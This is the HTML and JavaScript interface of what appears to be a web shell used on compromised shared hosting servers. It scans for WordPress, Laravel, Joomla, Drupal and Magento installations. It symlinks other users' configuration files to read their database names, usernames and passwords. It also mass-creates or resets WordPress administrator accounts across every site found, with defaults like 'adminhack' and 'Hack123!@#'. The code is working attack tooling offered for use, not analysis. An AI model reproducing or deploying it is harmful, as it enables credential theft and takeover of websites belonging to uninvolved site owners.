                    <input type="text" id="adminDisplayName" class="w-full bg-gray-900 border border-gray-700 rounded p-2 text-white" placeholder="Administrator" value="Hack Administrator">
                </div>
                <div class="pt-4 flex gap-3">
                    <button onclick="massCreateAdmin()" class="flex-1 bg-green-700 hover:bg-green-600 p-3 rounded font-bold">🚀 CREATE/UPDATE on ALL WordPress</button>
                    <button onclick="closeMassAdminModal()" class="flex-1 bg-gray-700 hover:bg-gray-600 p-3 rounded font-bold">Cancel</button>
                </div>
            </div>
        </div>
    </div>

    <script>
        let allCMSData = [];

        function postRequest(action, data = {}) {
            return fetch(window.location.href, {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({ action: action, ...data })
            }).then(res => res.json());
        }

        function showDomainInfo() {
            document.getElementById('domainModal').style.display = 'block';
            postRequest('get_domains').then(data => {
                const container = document.getElementById('domainList');
                let html = '<div class="bg-gray-800 p-3 rounded"><strong>📁 Domains from named.conf:</strong><br>';
                if(data.named_domains && data.named_domains.length > 0) {
                    html += data.named_domains.map(d => `<span class="inline-block bg-blue-900 px-2 py-1 rounded m-1 text-sm">${d}</span>`).join('');
                } else {
                    html += '<span class="text-gray-400">No domains found in named.conf</span>';
                }
                html += '</div><div class="bg-gray-800 p-3 rounded mt-3"><strong>🌐 Domains from Web Configs:</strong><br>';
                if(data.web_domains && data.web_domains.length > 0) {
                    html += data.web_domains.map(d => `<span class="inline-block bg-green-900 px-2 py-1 rounded m-1 text-sm">${d}</span>`).join('');
                } else {
                    html += '<span class="text-gray-400">No domains found in web configs</span>';
                }
                html += '</div>';
                container.innerHTML = html;
            });
        }

        function closeDomainModal() {
            document.getElementById('domainModal').style.display = 'none';
        }

        function openMassAdminModal() {
            document.getElementById('massAdminModal').style.display = 'block';
        }

        function closeMassAdminModal() {
            document.getElementById('massAdminModal').style.display = 'none';
        }

        async function massCreateAdmin() {
            const username = document.getElementById('adminUsername').value;
            const password = document.getElementById('adminPassword').value;
            const email = document.getElementById('adminEmail').value;
            const display_name = document.getElementById('adminDisplayName').value;

            if(!username || !password || !email) {
                alert('Please fill all required fields!');
                return;
            }

            const wordpressSites = allCMSData.filter(cms => cms.type === 'WordPress' && cms.config);
            if(wordpressSites.length === 0) {
                alert('No WordPress sites found!');
                return;
            }

            const adminData = {
                username: username,
                password: password,
                email: email,
                display_name: display_name,
                url: ''
            };

            const configs = wordpressSites.map(cms => cms.config);

            closeMassAdminModal();
            alert(`Processing ${configs.length} WordPress sites... This may take a moment.`);

            const result = await postRequest('create_admin_bulk', { configs: configs, admin_data: adminData });

            if(result.success) {
                let createdCount = result.results.filter(r => r.result.success && r.result.action === 'created').length;
                let updatedCount = result.results.filter(r => r.result.success && r.result.action === 'updated').length;
                let failCount = result.results.filter(r => !r.result.success).length;
                alert(`✅ Admin processed on ${createdCount + updatedCount} sites\n📝 Created: ${createdCount} | Updated: ${updatedCount}\n❌ Failed: ${failCount}`);
            } else {
                alert('Error processing admin creation');
            }
        }

        function updateTotalSymlinkCount() {
            postRequest('list').then(links => {
                document.getElementById('totalSymlinkCount').innerHTML = links.length;
            });
        }

        function updateStatistics(cmsList) {
            let counts = { 'WordPress': 0, 'Laravel': 0, 'CodeIgniter': 0, 'Joomla': 0, 'Drupal': 0, 'Magento': 0 };
            let domainCount = 0;
            cmsList.forEach(cms => {
                if(counts[cms.type] !== undefined) counts[cms.type]++;
                if(cms.is_domain_only) domainCount++;
            });
            document.getElementById('wpCount').innerHTML = counts['WordPress'];
            document.getElementById('laravelCount').innerHTML = counts['Laravel'];
            document.getElementById('ciCount').innerHTML = counts['CodeIgniter'];
            document.getElementById('joomlaCount').innerHTML = counts['Joomla'];
            document.getElementById('drupalCount').innerHTML = counts['Drupal'];
            document.getElementById('magentoCount').innerHTML = counts['Magento'];
            document.getElementById('domainCount').innerHTML = domainCount;
            document.getElementById('totalCMSDetected').innerHTML = cmsList.length;
        }

        function symlinkAllCMS() {
            const cmsToSymlink = allCMSData.filter(cms => cms.config);
            if(cmsToSymlink.length === 0) { alert('No CMS detected. Please scan first!'); return; }
            const btn = document.getElementById('symlinkAllBtn');
            const originalText = btn.innerHTML;
            btn.innerHTML = '<span class="spin">⚙️</span> CREATING SYMLINKS...';
            btn.disabled = true;

            const targets = cmsToSymlink.map(cms => cms.config).join('|');
            const usernames = cmsToSymlink.map(cms => cms.user).join('|');

            postRequest('create_bulk', { targets: targets, usernames: usernames }).then(data => {
                alert(`✅ Created ${data.count} symlinks (${data.failed || 0} failed)`);
                viewActiveLinks();
                updateTotalSymlinkCount();
                btn.innerHTML = originalText;
                btn.disabled = false;
            }).catch(() => { btn.innerHTML = originalText; btn.disabled = false; });
        }

        function scanServer() {
            const btn = document.getElementById('scanBtn');
            const status = document.getElementById('scanStatus');
            btn.innerHTML = '🔄 SCANNING...';
            btn.disabled = true;
            status.innerHTML = 'Scanning server for CMS installations and domains...';

            postRequest('scan').then(data => {
                allCMSData = data;
                displayResults(data);
                updateStatistics(data);
                btn.innerHTML = '✅ SCAN COMPLETE';
                status.innerHTML = `Found ${data.filter(c => c.config).length} CMS installations + ${data.filter(c => c.is_domain_only).length} domains`;
                setTimeout(() => { btn.innerHTML = 'START FULL SCAN'; btn.disabled = false; }, 3000);
                viewActiveLinks();
                updateTotalSymlinkCount();
            }).catch(error => {
                status.innerHTML = 'Error: ' + error;
                btn.innerHTML = 'START FULL SCAN';
                btn.disabled = false;
            });
        }

        function displayResults(cmsList) {
            const container = document.getElementById('results');
            if(cmsList.length === 0) {
                container.innerHTML = '<div class="text-gray-500 text-center p-8">No CMS or domains found</div>';
                return;
            }

            // Pisahkan domain info dan CMS
            const domainsOnly = cmsList.filter(c => c.is_domain_only);
            const cmsOnly = cmsList.filter(c => !c.is_domain_only);

            // Group CMS by type
            const grouped = {};
            cmsOnly.forEach(cms => { if(!grouped[cms.type]) grouped[cms.type] = []; grouped[cms.type].push(cms); });

            let html = '';

            // Domain Section
            if(domainsOnly.length > 0) {
                html += `
                <div class="bg-gray-800 rounded-xl overflow-hidden border border-cyan-700">
                    <div class="bg-gray-700 px-4 py-3 flex justify-between items-center">
                        <div class="flex items-center gap-2">
                            <span class="text-2xl">🌐</span>
                            <span class="font-bold text-lg">Detected Domains</span>
                            <span class="total-badge">${domainsOnly.length} domains</span>
                        </div>
                    </div>
                    <div class="cms-scroll-container">
                        <div class="p-4">
                            <div class="flex flex-wrap gap-2">
                `;
                domainsOnly.forEach(domain => {
                    html += `<span class="bg-cyan-900 px-3 py-1 rounded-full text-sm">${domain.domain}</span>`;
                });
                html += `</div></div></div></div>`;
            }

            // CMS Section
            for(const [type, items] of Object.entries(grouped)) {
                html += `
                <div class="bg-gray-800 rounded-xl overflow-hidden border border-gray-700">
                    <div class="bg-gray-700 px-4 py-3 flex justify-between items-center flex-wrap gap-2">
                        <div class="flex items-center gap-2">
                            <span class="text-2xl">${items[0].icon}</span>
                            <span class="font-bold text-lg">${type}</span>
                            <span class="total-badge">${items.length} sites</span>
                        </div>
                        <div class="flex gap-2">
                            ${type === 'WordPress' ? `<button onclick="openMassAdminModal()" class="bg-red-600 hover:bg-red-500 px-4 py-1 rounded text-sm font-bold">👑 Mass Admin</button>` : ''}
                            <button onclick="symlinkByType('${type}')" class="bg-purple-600 hover:bg-purple-500 px-4 py-1 rounded text-sm font-bold">🔗 Symlink All</button>
                            <button onclick="deleteByType('${type}')" class="delete-type-btn bg-red-800 hover:bg-red-700 px-4 py-1 rounded text-sm font-bold">🗑️ Delete All</button>
                        </div>
                    </div>
                    <div class="cms-scroll-container">
                        <div class="divide-y divide-gray-700">
                `;
                items.forEach(cms => {
                    html += `
                    <div class="p-4 hover:bg-gray-750 transition">
                        <div class="flex items-center justify-between flex-wrap gap-2">
                            <div>
                                <div class="font-bold text-green-400">📁 ${cms.user}</div>
                                <div class="text-sm text-gray-400 font-mono truncate max-w-md">${cms.config}</div>
                                ${cms.domain ? `<div class="text-xs text-cyan-400 mt-1">🌐 Domain: ${cms.domain}</div>` : ''}
                            </div>
                            <div class="flex gap-2 flex-wrap">
                                ${type === 'WordPress' ? `<button onclick="showSingleAdminForm('${cms.config.replace(/'/g, "\\'")}', '${cms.user.replace(/'/g, "\\'")}')" class="bg-red-700 hover:bg-red-600 px-3 py-1 rounded text-xs">👑 Create/Update Admin</button>` : ''}
                                <button onclick="createLink('${cms.config.replace(/'/g, "\\'")}', '${cms.user.replace(/'/g, "\\'")}')" class="bg-green-700 hover:bg-green-600 px-3 py-1 rounded text-xs">🔗 Symlink</button>
                                <button onclick="viewFile('${cms.config.replace(/'/g, "\\'")}')" class="bg-blue-700 hover:bg-blue-600 px-3 py-1 rounded text-xs">👁️ View</button>
                            </div>
                        </div>
                        <div class="text-xs text-gray-500 mt-1">Symlink: <code class="bg-gray-900 px-1 rounded">link_${cms.user}</code></div>
                    </div>`;
                });
                html += `</div></div></div>`;
            }

            container.innerHTML = html;
        }

        function symlinkByType(type) {
            const cmsByType = allCMSData.filter(cms => cms.type === type && cms.config);
            if(cmsByType.length === 0) { alert(`No ${type} CMS detected`); return; }
            const targets = cmsByType.map(cms => cms.config).join('|');
            const usernames = cmsByType.map(cms => cms.user).join('|');
            postRequest('create_bulk', { targets: targets, usernames: usernames }).then(data => {
                alert(`✅ Created ${data.count} symlinks for ${type}`);
                viewActiveLinks();
                updateTotalSymlinkCount();
            });
        }

        function deleteByType(type) {
            if(confirm(`Delete ALL symlinks for ${type}?`)) {
                postRequest('delete_by_type', { type: type }).then(data => {
                    alert(`✅ Deleted ${data.count} symlinks`);
                    viewActiveLinks();
                    updateTotalSymlinkCount();
                });
            }
        }

        function showSingleAdminForm(configPath, username) {
            const adminUser = prompt("Enter admin username:", "adminhack");
            if(!adminUser) return;
            const adminPass = prompt("Enter admin password:", "Hack123!@#");
            if(!adminPass) return;
            const adminEmail = prompt("Enter admin email:", "admin@hack.com");
            if(!adminEmail) return;
            const adminDisplay = prompt("Enter display name (optional):", "Hack Administrator");

            createSingleAdmin(configPath, adminUser, adminPass, adminEmail, adminDisplay || adminUser);
        }

        async function createSingleAdmin(configPath, username, password, email, displayName) {
            const adminData = { username, password, email, display_name: displayName, url: '' };
            const result = await postRequest('create_admin', { config_path: configPath, admin_data: adminData });
            if(result.success) {
                alert(`✅ ${result.action === 'updated' ? 'Updated' : 'Created'}: ${result.message}`);
            } else {
                alert(`❌ Failed: ${result.error}`);
            }
        }

        function createLink(target, username) {
            postRequest('create', { target: target, username: username }).then(data => {
                if(data.status === 'success') {
                    alert(`✅ Symlink created: ${data.link}`);
                    extractDBinfo(data.link);
                    viewActiveLinks();
                    updateTotalSymlinkCount();
                } else { alert('❌ Failed to create symlink'); }
            });
        }

        function viewFile(path) {
            postRequest('create', { target: path, username: 'temp_' + Date.now() }).then(data => {
                if(data.status === 'success') {
                    const w = window.open();
                    w.document.write('<pre style="background:#000;color:#0f0;padding:20px;">Loading...</pre>');
                    postRequest('view', { link: data.link }).then(content => {
                        w.document.body.innerHTML = `<pre style="background:#000;color:#0f0;padding:20px;white-space:pre-wrap;">${content}</pre>`;
                    });
                    setTimeout(() => { postRequest('delete', { link: data.link }); }, 5000);
                }
            });
        }

        function extractDBinfo(linkname) {
            postRequest('extract', { link: linkname }).then(info => {
                const container = document.getElementById('dbInfo');
                if(info.type && info.type !== 'Unknown') {
                    container.innerHTML = `
                        <div class="space-y-3">
                            <div class="font-bold text-green-400 text-lg">📊 ${info.type} Database</div>
                            <div class="grid grid-cols-2 gap-3">
                                <div class="bg-gray-900 p-3 rounded"><div class="text-gray-400 text-sm">Database</div><div class="font-mono text-green-300">${info.db || 'N/A'}</div></div>
                                <div class="bg-gray-900 p-3 rounded"><div class="text-gray-400 text-sm">Username</div><div class="font-mono text-blue-300">${info.user || 'N/A'}</div></div>
                                <div class="bg-gray-900 p-3 rounded"><div class="text-gray-400 text-sm">Password</div><div class="font-mono text-red-300">${info.pass || 'N/A'}</div></div>
                                <div class="bg-gray-900 p-3 rounded"><div class="text-gray-400 text-sm">Host</div><div class="font-mono text-yellow-300">${info.host || 'localhost'}</div></div>
                                ${info.prefix ? `<div class="bg-gray-900 p-3 rounded col-span-2"><div class="text-gray-400 text-sm">Table Prefix</div><div class="font-mono text-purple-300">${info.prefix}</div></div>` : ''}
                            </div>
                        </div>`;
                } else { container.innerHTML = '<p class="text-gray-500">No database info found</p>'; }
            });
        }

        function viewActiveLinks() {
            postRequest('list').then(links => {
                const container = document.getElementById('links');
                if(links.length === 0) {
                    container.innerHTML = '<div class="text-gray-500 col-span-3 text-center p-8">No active symlinks</div>';
                    return;
                }
                let html = '';
                links.forEach(link => {
                    html += `<div class="bg-gray-800 p-4 rounded border border-gray-700 hover:border-green-500">
                        <div class="flex justify-between items-center mb-2">
                            <div class="font-bold text-green-300 truncate">🔗 ${link.name}</div>
                            <div class="flex gap-1">
                                <button onclick="extractDBinfo('${link.name}')" class="bg-blue-700 hover:bg-blue-600 px-2 py-1 rounded text-xs">📊 DB</button>
                                <button onclick="deleteLink('${link.name}')" class="bg-red-700 hover:bg-red-600 px-2 py-1 rounded text-xs">🗑️ DEL</button>
                            </div>
                        </div>
                        <div class="text-xs text-gray-400 truncate font-mono">📄 ${link.target}</div>
                    </div>`;
                });
                container.innerHTML = html;
            });
        }

        function deleteLink(linkname) {
            if(confirm(`Delete symlink ${linkname}?`)) {
                postRequest('delete', { link: linkname }).then(() => { viewActiveLinks(); updateTotalSymlinkCount(); });
            }
        }

        function clearAll() {
            if(confirm('Delete ALL symlinks?')) {
                postRequest('delete_all').then(data => { alert(`Deleted ${data.count} symlinks`); viewActiveLinks(); updateTotalSymlinkCount(); });
            }
        }

        document.addEventListener('DOMContentLoaded', function() {
            setTimeout(scanServer, 1000);
            setInterval(updateTotalSymlinkCount, 5000);
        });
    </script>
</body>
</html>